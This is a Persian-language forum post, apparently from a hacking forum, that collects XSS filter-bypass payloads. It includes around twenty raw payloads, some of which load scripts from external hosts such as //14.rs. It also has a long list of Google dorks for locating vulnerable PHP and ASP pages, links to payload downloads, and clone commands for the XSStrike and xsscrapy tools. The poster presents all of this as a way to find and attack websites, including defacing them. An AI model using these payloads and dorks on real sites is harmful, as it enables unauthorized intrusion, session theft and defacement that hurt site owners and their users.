تعداد بازدید 2878

درود . در این تایپک انواع بای پس های باگ خطرناک xss رو میزاریم
این باگ در 80% سایت ها وجود داره و فقط باید بایپس بشه
xss انواع مختلقی داره و بهترین روش اینجکت کد های جاوا اسکریپت با متود get هست که در قسمت سرچ و یا هر قسمتی که با متود get ارسال بشه میشه استفاده کرد
و البته فرقی هم نداره و میشه با متود post تست کرد مثل فروم ها و فیلدهای ثبت نام و غیره . برای پیدا کردن سایت های که این باگ رو دارن دورک های زیادی نوشته شده که داخل همین انجمن میتونید پیدا کنید.
باگ xss قدرت بسیار بالای داره و یکی از خظرناک ترین و رایج ترین باگ ها هست شما میتونید کار های بسیار زیادی با استفاده از این باگ کنید و حتی سایت رو دیفیس کنید
در اینجا سعی میکنیم تمام اسکریپهای بایپس این باگ رو قرار بدیم
به علت قدرت بالای این باگ و اینکه گزاشتن مستقیم کد ها در انجمن باعث اجرای کد میشه اسکریپ ها در فایل تکست گزاشته میشه

دانلود :

xsscheatsheet

دانلود : xss code

دانلود :
xss script

دانلود :

XSS.script

و این هم کامل ترین و بزرگترین لیست از بایپس های این باگ که شخصا جمع اوری کردم و نوشتم

ترین لیست

دانلود از پیکوفایل

کد:

Full URI uriInHTMLData() uriInHTMLComment() uriInSingleQuotedAttr() uriInDoubleQuotedAttr() uriInUnQuotedAttr()

URI Path uriPathInHTMLData() uriPathInHTMLComment() uriPathInSingleQuotedAttr() uriPathInDoubleQuotedAttr() uriPathInUnQuotedAttr()

URI Query uriQueryInHTMLData() uriQueryInHTMLComment() uriQueryInSingleQuotedAttr() uriQueryInDoubleQuotedAttr() uriQueryInUnQuotedAttr()

URI Component uriComponentInHTMLData() uriComponentInHTMLComment() uriComponentInSingleQuotedAttr() uriComponentInDoubleQuotedAttr() uriComponentInUnQuotedAttr()

URI Fragment uriFragmentInHTMLData() uriFragmentInHTMLComment() uriFragmentInSingleQuotedAttr() uriFragmentInDoubleQuotedAttr() uriFragmentInUnQuotedAttr()

یک ابزار عالی پایتون برای تست نفوذ سایت با باگ xss

https://github.com/DanMcInerney/xsscrapy

git clone https://github.com/DanMcInerney/xsscrapy.git

cd xsscrapy

./xsscrapy.py -u http://example.com

بسیار عالی و کاربردی

این هم یک لیست خوب از پیلود های این باگ

Xenotix-payloads.list

بایپس های دیگر

کد:

<details open ontoggle=confirm()>

<script y="><">/*<script* */prompt()</script

<w="/x="y>"/ondblclick=`<`[confiru006d``]>z

<a href="javascript%26colon;alert(1)">click

<a href=javascript:alert(1)>click

<script/"<a"/src=data:=".<a,[8].some(confirm)>

<svg/x=">"/onload=confirm()//

<--`<img/src=` onerror=confirm``> --!>

<svg%0Aonload=%09((prou006dpt))()//

<sCript x>;(((confirm)))``</scRipt x>

<svg </onload ="1> (_=prompt,_(1)) "">

<!--><script src=//14.rs>

<embed src=//14.rs>

<script x=">" src=//15.rs></script>

<!/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>

<iframe/src //onload = prompt(1)

<x oncut=alert()>x

<svg onload=write()>

و این هم دروکهای خوب xss برای پیدا کردن سایت

کد:

inurl:".php?cmd="

inurl:".php?z="

inurl:".php?q="

inurl:".php?search="

inurl:".php?query="

inurl:".php?searchstring="

inurl:".php?keyword="

inurl:".php?file="

inurl:".php?years="

inurl:".php?txt="

inurl:".php?tag="

inurl:".php?max="

inurl:".php?from="

inurl:".php?author="

inurl:".php?pass="

inurl:".php?feedback="

inurl:".php?mail="

inurl:".php?cat="

inurl:".php?vote="

inurl:search.php?q=

inurl:com_feedpostold/feedpost.php?url=

inurl:scrapbook.php?id=

inurl:headersearch.php?sid=

inurl:/poll/default.asp?catid=

inurl:/search_results.php?search=

inurl:/products/orkutclone/scrapbook.php?id=

inurl:/products/classified/headersearch.php?sid=

inurl:/search_results.php?search=Search&k=

inurl:/preaspjobboard//Employee/emp_login.asp?msg1=

inurl:pages/match_report.php?mid= pages/match_report.php?mid=

inurl:/notice.php?msg= /notice.php?msg=

inurl:/gen_confirm.php?errmsg= /gen_confirm.php?errmsg=

inurl:/index.php?option=com_easygb&Itemid=

inurl:/2wayvideochat/index.php?r=

inurl:/view.php?PID= /view.php?PID=

inurl:/Property-Cpanel.html?pid= /Property-Cpanel.html?pid=

inurl:/showproperty.php?id= /showproperty.php?id=

inurl:/vehicle/buy_do_search/?order_direction=

inurl:/elms/subscribe.php?course_id= /elms/subscribe.php?course_id=

inurl:/winners.php?year=2008&type= /winners.php?

inurl:/schoolmv2/html/studentmain.php?*******=

inurl:/site_search.php?sfunction= /site_search.php?sfunction=

inurl:/search.php?search_keywords= /search.php?search_keywords=

inurl:/hexjector.php?site= /hexjector.php?site=

inurl:/news.php?id= /news.php?id=

inurl:/index.php?view=help&faq=1&ref=

inurl:"contentPage.php?id="

inurl:"displayResource.php?id="

inurl:/index.php?

inurl:/info.asp?

inurl:/preaspjobboard//Employee/emp_login.asp?msg1=

inurl:/pages/match_report.php?mid= pages/match_report.php?mid=

سایت کاربردی جهت تست نفوذ باگ xss و دانلود ابزارها و ...

https://find-xss.net

یک لیست از متود های جدید و حرفه ای برای بایپس باگ xss

دانلود :

xss scipt

مقاله مفید و یک ابزار برای اموزش XSS (Cross Site Scripting)

https://n0p.net/penguicon/php_app_sec/mirror/xss.html

سایت xss scanner برای تست انلاین باگ xss

pentest-tools.com/website-vulnerability-scanning/xss-scanner-online

ابزار
XSStrike
انواع حملات باگ xss

Suggest a feature

Report a bug

Fix something and open a pull request

Create a browser extension

Create a burp suite/zaproxy plugin

Help me document the code

Spread the word

https://github.com/s0md3v/XSStrike.git

git clone https://github.com/s0md3v/XSStrike.git

13 فایل حاوی پیلود و بای پس های جدید و قوی باگ

دانلود :
https://drive.google.com/drive/folders/1e8h13qHnlEsj-8iutyRoOvqHSR46wFLz?usp=sharing

تعداد بازدید 2878 انواع بایپس های باگ XSS
نویسنده	پیام